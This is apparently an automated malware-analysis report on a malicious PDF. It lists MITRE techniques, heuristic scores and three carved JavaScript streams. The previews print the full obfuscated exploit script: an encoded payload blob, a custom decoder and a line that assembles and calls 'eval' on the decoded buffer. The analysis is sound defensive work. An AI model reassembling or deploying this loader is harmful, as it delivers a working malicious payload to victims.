Risk Score: 116 (MALICIOUS)
Malware Insights
MITRE ATT&CK
- T1059.007 JavaScript
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The PDF sample contains embedded JavaScript, flagged by multiple heuristics as a potential exploit. The JavaScript is obfuscated: it uses `String.fromCharCode` and custom decoding functions to construct a payload and then execute it. The line `hmglkuj8='e'+''+'v'+''+'a'+'l';hmglkuj8(emyrynh5);` assembles the string `eval` from single characters and calls it on the decoded buffer `emyrynh5`, which strongly suggests that `eval` is used to execute the decoded JavaScript, a common technique for downloading and running further malicious content.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (4)
- JavaScript action (low, 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);}
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj263984_000.js | pdf-javascript-stream | PDF /JS object 263984 at offset 0x197 | 2432 bytes | c00d191bf3b27b32ad543d64884896dec301afad08f9ae66a1518c8f48ec6e12 |

Preview script for javascript_obj263984_000.js (first 1,000 lines of the extracted script):
imbvflh="0T1E1Z1f2Z1d3P1`1a242R1^3a1[2L2U1R1W3K1U2b1S3Z3_1P2]1L1M272f1J3^1H3S1F3f3h1=1B3`1@2_1>3N3Y0`1:3M183L163d1.11122Y2e1/2T2W0g0j1*3/330h3+3-0c0d3G3T0a3=3E0^2[0[3]0Y2h0W3b0U2V2g0:0K0P2O0N2d0L3V3X0I2J0G2^0A0D2S0B3I3Q0=0>3W3c0;2X3R06072`3O042a2c";bpysg=".Nf,dgY9:MehXMcX7E.H9/Qh>a^b-gF0?=hIQ_a_7E.H9/UeECfVYI_b?0Sj`7VhZj1+O??7L91L`-feP[1M[BeF0?;j8-4SV;cg@Sh=BM[cWI1ND9/bMeHf0JjTPaHPcR`ZeF0?=aO_HQSV;cg@8Q+Kj8--JZc6TK[1TY7Y5RM^[0`9TQ`iSY=^[0ZacG8-4RF;eP6Sh:AR6+J6+K_c6TK[1T2VVh=eJY?***+_c6TK[1T5.E=5N@Sh<=eHB:WR_HK6WJ:P0[_3K@G,<CP:J+YZJ**:P5*.3TbaK58+D.d=*K/*/R:Uf+,H_-2:04,.4-aR:L^P:LJhT.`R9K9D,>3C<JK/+e_3f;=2<^/+,B?Q:PD`V2**e.+Z+,7,bB:14a.**,._:8K/Xbc:*+_3JJ,.i@E,Hf<:PDZ_2**e.ZZ+,H1I,**+,,.*:LWON2**e.i:+,Hf<:PDZ_2**e.Vc*K*F5R=]67,@]=2:-GD.**,..`c:K<J,.jZe.VC^2=@OG,6fGK50+>3gJ,.haNK/BZ_2**D.ZZ+,<Z:R:1BD.**,._Q]K00h_2+V,.**,.Z67,<Z:R:1C_2**.2*F<.*83,D=d:M-He.+aE,**+,I5-:QX_N2?f-:J*+R=-*.2*F<.@*:R:6cN3S9O,67fR:1CV2**.22@0K6352:*+_3gJ,.haNK6`KR:*+_3KJ,.g8i.**,..2*K/E52:*+_3gJ,.haNK6`KR:*+_3CZ+,*cA:QNBD.WNP:J0fB:**2:=AK,/4*2=j-R<[Q6K7D?_2^Wa.VB/:Q]*2=bD<.?M-:J*+R=-*.35+,K*GKR:**2=<I4.BEb:J0Z2:**2=*Z_35+,K*GQ:J**:J+[2:*cN3S9O,67fR:1CV2**.3gV7,Hf<:K8BD.**7,BB*K*-L:LZ,/,+Q.K73gR;KYG,*f7K***K+,Z_3K3C,**8K35*.3JV@K63PZP7C4.CE9K***K***K***K***K***K***K***K***K8[;>3LLO:Q5GN3J/+,/4d_2SbI,4B*:Q8c>2SQ4K87_R=Q/0K,S/0K*+=R=V>?,B+<R=K/0K/8e_3]X?,GK;R:T[?R=,J,.fHO,/HU2=UGN2__*:JMI4..?gR;J@,.4ZPZKS,@K9N2T.Vc>R;U@+,*/P:J**:M@+D.*^PR:**2:LbG,IJ@K*6dT.**,.4-aR=f/I,8B^R;U*W,*C^>2**.2_We_2+Q,K***K*V;D.F`i:J*+R:M:+,+BL_2dUgK**-:P**:K/L7:Qc/R:-8DK***K6_M>2V`C_3Q.@K9Z5:J0F`,**+,6fd:L[A]K+6[_2=K@K,OC4.^:?,D_T_3Pf4.@G4_2/W,.6?i:J*+R<^J,.OZXK,5G_3R6G,+B-:MKIN2**D.i:+,.@C_3i+D.*^PR:**2=@P@K*+Z:J**:J**:J**:J**:J**:J**:J**:Q]*2;^Ad,**0K6c*K7j,R::Vi..2:R=7Z>2-L7:QJ^B;STaZJ04?,DWU>3P6W,4CKR;:O5:KW?V2SLO:J*SN3KV].>S=2:RUK:Q6fB=QF4.[A4K/GZR=PG4.>fVK,J*2=Xd>2>+@:KWd>2?jC,*1C,/0e_2?EQ:KWfc=Y4,.*,JK,OGg2>+<R:ZU.K8gZR=W4?,GBaZQ5F4.dKK:K:0a.4-YK8OB>3C?OR<:**hF8Q+O>82h;dO`7Vh9T5.E=5N@YSWQX]hj=G>BeF0?:cM`=E9=eL559
>bG-=^5TECe1e,hWhZeF0?:cM`7L91L`9T<I=^,/W0M_323+,<,:-`ZeF0?=BM[cW=eK1`fG1[FDa2gH59eSWQX1=J]T1.HSLe=O^>iRD[O7b:ATJ**,d=F>;CCceF0?:ObT0ML9>[G3]h9T*f=/_Q5_jeBXNdF[aP5S8ARI1eX1cc6TTTgagXL99.E7jBXNdGYO9TE.H9/T1e5.E=5N@8Q+O>I^J]T1.HSFGUZSObeQ`39SdK,aM;e.+J6K*B-+ecG8-4SiY^eED0UMWH/6XjA_a^bCHjSj_S>V7F9]cfAK=5Y`-feO[aY,PAIMSj8-4RYIQ[eUdLg_[0Pj/`bWSh=H`dSL7A^/dSWBAE[H.9SPg^LA0QcgM=I@d1Kdj?H1UWX?[aY,PAIMjF8J";awxlkl=2695;kmcvy=new Array();

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj263985_001.js | pdf-javascript-stream | PDF /JS object 263985 at offset 0x871 | 492 bytes | 01b70d8333944ff1dfcccc44190b137cf46ee69740b87747350fff0d4267e2e8 |

Detection for javascript_obj263985_001.js:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s).

Preview script for javascript_obj263985_001.js (first 1,000 lines of the extracted script):
while(imbvflh.length){kmcvy.push((yrjsi(imbvflh.charCodeAt(0))<<(4+2))+yrjsi(imbvflh.charCodeAt(1))-(500+12));imbvflh=imbvflh.slice(2,imbvflh.length)}foatkqy=kzbnepk=imbvflh=0;emyrynh5='';function yrjsi(apbpxng){if(apbpxng>92)apbpxng--;return apbpxng-42}function iscuhtd(){if(imbvflh==0){kzbnepk=yrjsi(bpysg.charCodeAt(foatkqy++));imbvflh=6;}return ((kzbnepk>>--imbvflh)&0x01);}while(awxlkl--){i=0;while(kmcvy[i]<0){if(iscuhtd())i=-kmcvy[i];else i++;}emyrynh5+=String.fromCharCode(kmcvy[i]);}

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj263986_002.js | pdf-javascript-stream | PDF /JS object 263986 at offset 0x9D1 | 50 bytes | 597f4807e7ec0f7c502dd6db7be4a16bc92fa57e63cdb76e8c8dbd5c353a2fa4 |

Preview script for javascript_obj263986_002.js (first 1,000 lines of the extracted script):
hmglkuj8='e'+''+'v'+''+'a'+'l';hmglkuj8(emyrynh5);